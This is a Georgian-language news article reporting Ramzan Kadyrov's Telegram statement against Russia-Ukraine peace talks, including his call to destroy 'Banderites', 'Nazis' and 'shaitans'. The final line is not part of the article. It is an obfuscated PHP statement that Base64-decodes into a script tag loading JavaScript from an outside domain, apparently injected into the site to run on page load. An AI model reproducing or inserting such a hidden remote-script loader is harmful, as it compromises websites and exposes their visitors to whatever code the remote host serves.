celsiusi
ავერსი შნაიდერი
ჩეჩნეთის მეთაური რამზან კადიროვი რუსეთ-უკრაინას შორის სამშვიდობო მოლაპარაკებების გამართვას ეწინააღმდეგება და ამბობს, რომ მას და მის თანაგუნდელებს ეს არ მოსწონთ, თუმცა ეს პოლიტიკური საკითხია და როგორც პრეზიდენტი გადაწყვეტს ისე იქნება. 
 
კადიროვის თქმით,  ჯერ „ბანდერელები"(უკრაინელი ნაციონალისტები. იბრძოდნენ საბჭოთა კავშირისა და ნაცისტური გერმანიის წინააღმდეგ)  და "შაითანები"(ბოროტი სულები ისლამურ სამყაროში) უნდა გაანადგურონ  და მერე დაფიქრდნენ რა უნდა გააკეთონ. ამის შესახებ კადიროვი თავის Telegram-ში ვიდეომიმართვას ავრცელებს. 
 
„ამბობენ რომ უკრაინამ მოიგო, რუსეთი მიდის და ა.შ. დარწმუნებული ვარ, რომ ეს მოლაპარაკებები უსარგებლო იქნება. მე როგორც მეომარი არ ვეთანხმები ამ მოლაპარაკებებს და შეთანხმებებს, მებრძოლები არ ვეთანხმებით. ვფიქრობ, ბოლომდე უნდა დავასრულოთ ის, რაც დავიწყეთ: გავანადგუროთ ბანდერები, ნაცები  და შაითანები. მხოლოდ ამის შემდეგ უნდა გადაწყვიტოთ რა გავაკეთოთ  შემდეგში. საეროდ მე როგორც მებრძოლი წინააღმდეგი ვარ ამ მოლაპარაკების, მებრძოლები ამას არ ვეთანხმებით, მაგრამ ასეთი საკითხები პრეზიდენტმა უნდა გადაწყვიტოს, ჩვენ გვყავს პრეზიდენტი და ის როგორც იტყვის ისე იქნება-განაცხადა მან. 
 
 
 
1027
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");